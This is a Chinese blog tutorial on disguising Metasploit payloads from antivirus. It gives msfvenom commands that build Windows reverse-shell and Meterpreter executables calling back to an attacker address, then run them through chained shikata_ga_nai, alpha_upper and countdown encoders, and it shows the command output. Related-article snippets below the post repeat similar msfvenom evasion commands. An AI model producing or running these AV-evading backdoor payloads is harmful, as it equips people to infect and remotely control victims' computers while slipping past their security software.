对msf生成的攻击载荷进行免杀处理

最新推荐文章于 2024-07-21 18:16:48 发布
最新推荐文章于 2024-07-21 18:16:48 发布
阅读量3.7k 收藏 10
点赞数 1
分类专栏: 与安全相关 文章标签: Metasploit 免杀处理
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ZT7524/article/details/80148878
版权

使用MSF编码器

避免被查杀的最佳方法之一就是使用MSF编码器(集成入msfvenom功能程序)对我们要生成的攻击载荷文件进行重新编码。MSF编码器是一个非常实用的工具,它能够改变可执行文件中的代码形状,让杀毒软件认不出它原来的样子,而程序功能不会受到任何影响。和电子邮件附件使用Base64重新编码类似,MSF编码器将原始的可执行程序进行编码,并生成一个新的二进制文件。当这个文件运行后,MSF编码器会将原始程序解码到内存中并执行。

我们可以使用msfvenom -h命令查看MSF编码器的各种参数,它们当中最为重要的是与编码格式有关的参数。在下面的学习中,我们可以使用msvenom -l encoders列出所有可用的编码格式。但是需要注意的是不同的编码格式适用于不同的操作系统平台。由于架构不同,一个Power PCPPC)编码器生成的文件在x86平台上将无法正常工作。

root@bogon:~# msfvenom -l encoders

Framework Encoders

==================

    Name                          Rank       Description

    ----                          ----       -----------

    cmd/echo                      good       Echo Command Encoder

    cmd/generic_sh              manual     Generic Shell Variable Substitution Command Encoder

    cmd/ifs                       low        Generic ${IFS} Substitution Command Encoder

    cmd/perl                      normal     Perl Command Encoder

    cmd/powershell_base64         excellent  Powershell Base64 Command Encoder

    cmd/printf_php_mq             manual     printf(1) via PHP magic_quotes Utility Command Encoder

    generic/eicar                 manual     The EICAR Encoder

    generic/none                  normal     The "none" Encoder

    mipsbe/byte_xori              normal     Byte XORi Encoder

    mipsbe/longxor                normal     XOR Encoder

    mipsle/byte_xori              normal     Byte XORi Encoder

    mipsle/longxor                normal     XOR Encoder

    php/base64                    great      PHP Base64 Encoder

    ppc/longxor                   normal     PPC LongXOR Encoder

    ppc/longxor_tag               normal     PPC LongXOR Encoder

    sparc/longxor_tag             normal     SPARC DWORD XOR Encoder

    x64/xor                       normal     XOR Encoder

    x64/zutto_dekiru              manual     Zutto Dekiru

    x86/add_sub                   manual     Add/Sub Encoder

      ………

    x86/shikata_ga_nai            excellent  Polymorphic XOR Additive Feedback Encoder

    x86/single_static_bit         manual     Single Static Bit

    x86/unicode_mixed             manual     Alpha2 Alphanumeric Unicode Mixedcase Encoder

x86/unicode_upper             manual     Alpha2 Alphanumeric Unicode Uppercase Encoder

现在我们对MSF攻击载荷进行编码,将MSF攻击载荷生成器生成的原始数据输入MSF编码器中,并查看生成的可执行文件还会不会被杀毒软件检测到。相关代码如代码清如下所示


root@bogon:~# msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.128 LPORT=31337 -e x86/shikata_ga_nai -f exe -o /root/payload2.exe             ①

No platform was selected, choosing Msf::Module::Platform::Windows from the payload

No Arch selected, selecting Arch: x86 from the payload

Found 1 compatible encoders

Attempting to encode payload with 1 iterations of x86/shikata_ga_nai

x86/shikata_ga_nai succeeded with size 351 (iteration=0)

x86/shikata_ga_nai chosen with final size 351

Payload size: 351 bytes

Final size of exe file: 73802 bytes

Saved as: /root/payload2.exe

root@bogon:~#file payload2.exe                                    ②

payload2.exe: PE32 executable (GUI) Intel 80386, for MS Windows

我们在msfvenom命令选项中使用-p指定使用的攻击载荷模块,使用-e指定使用x86/shikata_ga_nai编码器,使用-f选项告诉MSF编码器输出格式为exe-o选项指定输出的文件名为payload2.exe,保存在根目录下。

最后,我们对生成的文件进行快速类型检查,确保生成文件是Windows可执行文件格式,检查结果告诉我们文件没有问题。然而不幸的是,当我们将payload2.exe拷贝到我们的Windows主机上后,还是没能逃过杀毒软件的检测。

这时我们可以使用多重编码

root@bogon:~# msfvenom -p windows/meterpreter/reverse_tcp lhost=10.10.10.128 lport=31337 -e x86/shikata_ga_nai -i 10 -f raw | msfvenom -e x86/alpha_upper -a x86 --platform windows -i 5 -f raw | msfvenom -e x86/shikata_ga_nai -a x86 --platform windows -i 10 -f raw | msfvenom -e x86/countdown -a x86 --platform windows -i 10 -f exe -o /root/payload3.exe ①
Attempting to read payload from STDIN...
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
Found 1 compatible encoders
Attempting to encode payload with 10 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 360 (iteration=0)
x86/shikata_ga_nai succeeded with size 387 (iteration=1)
……
x86/shikata_ga_nai succeeded with size 576 (iteration=8)
x86/shikata_ga_nai succeeded with size 603 (iteration=9)
x86/shikata_ga_nai chosen with final size 603
Payload size: 603 bytes
/usr/share/metasploit-framework/lib/msf/core/payload/dalvik.rb:72:in `not_after=': bignum too big to convert into `long' (RangeError)
	from /usr/share/metasploit-framework/lib/msf/core/payload/dalvik.rb:72:in `generate_cert'
	from /usr/share/metasploit-framework/modules/payloads/stagers/android/reverse_http.rb:56:in `generate_jar'
	from /usr/share/metasploit-framework/lib/msf/core/payload/dalvik.rb:27:in `generate'
	from /usr/share/metasploit-framework/lib/msf/core/payload.rb:200:in `size'
	from /usr/share/metasploit-framework/lib/msf/core/payload_set.rb:158:in `block (2 levels) 
……

	from /usr/share/metasploit-framework/lib/msf/core/module_manager/loading.rb:115:in `each'
	from /usr/share/metasploit-framework/lib/msf/core/module_manager/loading.rb:115:in `load_modules'
	from /usr/share/metasploit-framework/lib/msf/core/module_manager/module_paths.rb:41:in `block in add_module_path'
	/usr/share/metasploit-framework/lib/msf/base/simple/framework/module_paths.rb:49:in `init_module_paths'
	from /usr/share/metasploit-framework/lib/msf/base/simple/framework.rb:121:in `simplify'
	from /usr/share/metasploit-framework/lib/msf/base/simple/framework.rb:73:in `create'
	from /usr/bin/msfvenom:39:in `init_framework'
	from /usr/bin/msfvenom:48:in `framework'
	from /usr/bin/msfvenom:334:in `<main>'
/usr/share/metasploit-framework/lib/msf/core/payload/dalvik.rb:72:in `not_after=': bignum too big to convert into `long' (RangeError)
	from /usr/share/metasploit-framework/lib/msf/core/payload/dalvik.rb:72:in `generate_cert'
	from /usr/share/metasploit-framework/modules/payloads/stagers/android/reverse_tcp.rb:55:in `generate_jar'
	from /usr/share/metasploit-framework/lib/msf/core/payload/dalvik.rb:27:in `generate'
	from /usr/share/metasploit-framework/lib/msf/core/payload.rb:200:in `size'
	from /usr/share/metasploit-framework/lib/msf/core/payload_set.rb:158:in `block (2 levels) in recalculate'
	……
	from /usr/share/metasploit-framework/lib/msf/base/simple/framework/module_paths.rb:49:in `each'
	from /usr/share/metasploit-framework/lib/msf/base/simple/framework/module_paths.rb:49:in `init_module_paths'
	from /usr/share/metasploit-framework/lib/msf/base/simple/framework.rb:121:in `simplify'
	from /usr/share/metasploit-framework/lib/msf/base/simple/framework.rb:73:in `create'
	from /usr/bin/msfvenom:39:in `init_framework'
	from /usr/bin/msfvenom:48:in `framework'
	from /usr/bin/msfvenom:334:in `<main>'
Found 1 compatible encoders
Attempting to encode payload with 10 iterations of x86/countdown
x86/countdown succeeded with size 16 (iteration=0)
x86/countdown succeeded with size 32 (iteration=1)
……
x86/countdown succeeded with size 161 (iteration=9)
x86/countdown chosen with final size 161
Payload size: 161 bytes
Final size of exe file: 73802 bytes
Saved as: /root/payload3.exe

如果此时还未能逃过杀毒软件的扫描,则我们可以自定义可执行文件模板。

Solarzhou
关注
专栏目录
MSF编码与upx加壳过杀软
悦分享
08-03 2359
本文详细介绍了使用Metasploit创建攻击载荷(使用攻击载荷生成msfvenom),以及对攻击载荷进行免杀、加壳处理,从而突破杀毒软件。
msf渗透linux教程,Metasploit后门渗透Linux系统以及跨平台后门生成
weixin_31312621的博客
05-03 1645
本帖最后由 小爱_Joker 于 2017-3-9 12:30 编辑标题:Metasploit后门渗透Linux系统以及跨平台后门生成作者:小爱_Joker难度:两级阅读点:使用Metasploit生成多种后门从而快速渗透linux系统上次发的那个Metasploit使用php后门渗透linux主机 不造为啥不能shell 使用终端 有点尴尬。攻击者IP:192.168.0.5受害者IP:192....
网络安全进阶篇之免杀(十四章-9)MSF加密壳免杀过360
划水的小白白
06-01 745
文章目录一、 概念1.1 360 安全卫士和 360 杀毒二、前期准备2.1 下载地址三、具体过程3.1 使用MSF生成木马并监听3.2 免杀过程3.3 测试 一、 概念 1.1 360 安全卫士和 360 杀毒 360 杀毒是 360 安全中心出品的一款免费的云安全杀毒软件。 它创新性地整合了五大领先查杀引擎,包括国际知名的 BitDefender 病毒查杀引擎、 Avira(小红伞)病毒查杀引擎、360 云查杀引擎、 360 主动防御引擎以及 360 第二代 QVM 人工智能引擎。 二、前期准备
攻击载荷免杀技术
06-15 373
大多数杀毒软件使用特征码来识别恶意代码。特征码在杀毒引擎中,对磁盘和进程进行扫描匹配。 为了避开杀毒软件,可以针对特征码创建一个独一无二的攻击载荷,它不与杀毒软件的任何特征码匹配。 当直接渗透时,metasploit攻击载荷可以只在内存中运行,不将任何数据写入到硬盘上,我们发起攻击并上传攻击载荷后,大多数杀毒软件都无法检测出来。 1.使用MSF攻击载荷生成器创建可独立运行的木...
免杀/免杀-零开始攻防笔记
程序员三九的博客
07-21 556
读取远程的文件我这里用递归读取而远程文件可以直接开个python的http服务读取注册表前提是得写入注册表^_^四.加载器入口点的写法对于加载器的写法
msf免杀
weixin_30662849的博客
04-13 289
卧槽 最近闲的没事干 搞一下渗透学习下 拿到 一个域成员权限,但是有360 。。。。(&……% 好烦啊 都不能免杀 突然看到一个帖子 很牛逼 依然到现在还是免杀的 首先msfvenom -p windows/meterpreter/reverse_tcp LPORT=5555 LHOST=192.168.1.100 -e x86/shikata_ga_nai -i 11 ...
msf之进阶免杀技术,无视360
qq_42965523的博客
07-07 3190
大家好!我是阿杰,今天我写一篇关于msf免杀技术的文章,如果你喜欢请为我打call,我会一直写下去. 首先我们需要: 说明:python监听虽然可以绕过360,但仅限于安装了python的目标,这是具有局限性的,因此本文章教你如何生成python的exe攻击程序,并且绕过360.具有非常好的广泛性,请勿用于非法用途 pyinstaller 安装教程: 打开cmd 输入 pip install pyinstaller 静等下载完成即可 打开kali进入终端 输入以下指令生成一个python的文件 然后进
关于msf反弹后门的免杀Tips
ai74583的博客
04-20 568
msf是一个很强大的工具,我经常会在渗透用它来反弹shell,不过它生成的反弹后门会被不少杀软kill,这篇文章只是讲讲我在msf中一个简单的免杀小技巧 思路 我以前接触过一款python的远控,其实说是远控,基本也就是nc的功能加了一个服务端的web页面控制并加了一些其他的功能可以用来管理诸多客户机 这款远控我下载下来用过,并用pyinstaller打包成了exe(缺点是体积太过庞大...
MSF攻击载荷生成器是干什么的
最新发布
08-02
MSF (Metasploit Framework) 是一个广泛使用的渗透测试工具套件,它包含了一个名为 "payload generator" 的组件,用于生成恶意软件载荷或exploit(漏洞利用)。这个载荷生成器允许攻击者根据目标系统的架构、操作...
Msf攻击Win7
07-09
Msf攻击Win7】指的是使用Metasploit框架对Windows 7系统进行渗透测试或漏洞利用的过程。Metasploit是一款开源的安全漏洞检测工具,广泛应用于安全研究、渗透测试和教育领域。它包含了大量的exploits(漏洞利用代码...
Metasploit 实现木马生成、捆绑及免杀
阿里云云栖号
10-08 5297
简介:在渗透测试的过程中,避免不了使用到社会工程学的方式来诱骗对方运行我们的木马或者点击我们准备好的恶意链接。木马的捆绑在社会工程学中是我们经常使用的手段,而为了躲避杀毒软件的查杀,我们又不得不对木马进行免杀处理。本次实验我们将学习如何通过Metasploitmsfvenom命令来生成木马、捆绑木马以及对木马进行免杀处理。木马文件风险高,想要免杀需要用shellter工具捆绑下,但是处理后木马文件还是能被360检测到拦截下来。 实验环境: Kali Linux 知识点: msfvenom 如何生.
利用360软件设置的360终极免杀.绝对过360
11-19
哼哼,研究了半年终于弄出了个利用360内部程序做的360免杀.百分之百过360.... 希望大家采纳!!!!!
msfvenom payload 免杀简单实践
Hello World.c
02-22 927
免杀简单实践 实验各种渗透框架的后门,结果很多文件放到硬盘上就开始报毒,这样的话根本 很难实际使用,网上搜索各种免杀工具,据发布有些时间的似乎也都不行,自己 稍微熟悉点的可能是dll这一块,看到有通过加密payload然后再打包成dll,最后 用regsvr32 加载执行的思路,感觉可以是实践下,好歹这个可以自己写下程序。 选择payload 这里选择msf的经典payload:windows/meterpreter/reverse_tcp //生成c形式的payload msfvenom -a x86 -
vulnstack(红日)内网渗透靶场二: 免杀360拿下域控
xf555er的博客
05-30 2426
当针对内网主机使用MSF进行永恒之蓝漏洞攻击失败时,一个替代方案是首先利用frp实现内网穿透,然后再进行漏洞利用。这种方法可能会产生意想不到的效果。我原本计划通过Meterpreter的portfwd命令将域控的3389端口映射到kali本地端口,随后使用rdesktop进行远程登录。然而,这一计划并未成功,我推测这可能是因为域控做了某些限制,只允许10.10.10.0/24网段的主机进行远程登录。
[技术分享]利用MSBuild制作msf免杀的后门
weixin_30851867的博客
09-22 164
文章github上有公开现成的shellcode,这就是shellcode 我这次选择了32位的那个版本来进行演示 需要改写的是shellcode那部分: 选择CobaltStrike:payload>windows>meterpreter>reverse_tcp设置选项如下:监听端口:22222,生成的格式为c,...
Metasploit免杀初探索
mingyqf的博客
12-05 422
Metasploit免杀初探索 转载链接:https://zhuanlan.zhihu.com/p/222968474 安全狗 安全狗 领先的云安全服务与解决方案提供商 2 人赞同了该文章 0x01 环境搭建 测试系统:windows10 (1909) 杀毒软件:360安全卫士 在线杀毒:VT 0x02 payload生成 msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.129 LPORT=7777 -f exe -o t.exe
远控免杀专题文章(3)-msf免杀(VT免杀率35/69)
Ms08067安全实验室
02-17 449
本专题文章导航1、远控免杀专题文章(1)-基础篇:https://mp.weixin.qq.com/s/3LZ_cj2gDC1bQATxqBfweg2、远控免杀专题文章(2)-msfve...
metaspolit 基础
weixin_34336526的博客
04-10 218
在kali中使用metasploit,需要先开启PostgreSQL数据库服务和metasploit服务,然后就可以完整的利用msf数据库查询exploit和记录了。这一点比bt5要方便很多,所以现在就放弃了bt5。 4 ]3 f. Q5 F5 [ 具体命令与截图 service postgresql start service metasploit start 复制...
使用Metasploit生成攻击载荷——msfvenom免杀、upx加壳
渗透测试
06-06 7580
文章目录前言一、免杀1.msfvenom的使用2.多重编码二、加壳1.upx的使用总结 前言 本文详细介绍了使用Metasploit创建攻击载荷(使用攻击载荷生成msfvenom),以及对攻击载荷进行免杀、加壳处理,从而突破杀毒软件 一、免杀 免杀字面意思就是避免被杀掉,准确点说就是创建的攻击载荷在对方电脑上运行的时候,可能会被杀毒软件干掉,使用相关技术让载荷躲过杀毒软件的扫描 1.msfvenom的使用 ┌──(root????kali)-[~] └─# msfvenom info
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值